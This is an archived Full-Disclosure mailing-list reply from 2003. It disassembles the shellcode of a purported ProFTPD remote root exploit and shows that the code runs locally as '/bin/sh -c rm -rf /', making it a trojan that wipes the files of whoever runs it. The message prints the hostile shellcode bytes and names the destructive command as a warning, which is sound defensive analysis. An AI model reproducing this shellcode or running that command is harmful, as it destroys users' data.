| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20031024153453.GC10898@srv9.de.buehler.net> From: pb+full-disclosure at mlsub.buehler.net (Philipp Buehler) Subject: ProFTPD-1.2.9rc2 remote root exploit On 24/10/2003, GARCIA Lionel <lionel.garcia@...bus.com> wrote To full-disclosure@...ts.netsys.com: > ---> void(*sleep)()=(void*)sc;sleep(5); <------- Hummm :-\ obscure the obvious :) > The shellcode seems to be locally launched. Anybody to "decrypt" the > shellcode ? Well, not "fully", since this already gives enough clues: \x31\xc0 xorl %eax,%eax \x50 pushl %eax \x68\x66\x20\x2f\x58 pushl $0x66202f58 !"f /X" \x68\x6d\x20\x2d\x72 pushl $0x6d202d72 !"m -r" \x68\x2d\x63\x58\x72 pushl $0x2d635872 !"rcXr" \x68\x41\x41\x41\x41 pushl $0x41414141 !"AAAA" \x68\x41\x41\x41\x41 pushl $0x41414141 !"AAAA" \x68\x41\x41\x41\x41 pushl $0x41414141 !"AAAA" \x68\x41\x41\x41\x41 pushl $0x41414141 !"AAAA" \x68\x2f\x73\x68\x43 pushl $0x2f736843 !"/shC" \x68\x2f\x62\x69\x6e pushl $0x2f62696e !"/bin" \x31\xc0 xorl %eax,%eax Then some "creative hopping" to connect this to an "/bin/sh rm -rf /" If shellcode matches 0x72, 0x6d, 0x2d and 0x66 .. always be "alerted" :> 'LOVE' in the air ... :) ciao -- Philipp Buehler, aka fips | <double-p> When the horse dies, get off.
Powered by blists - more mailing lists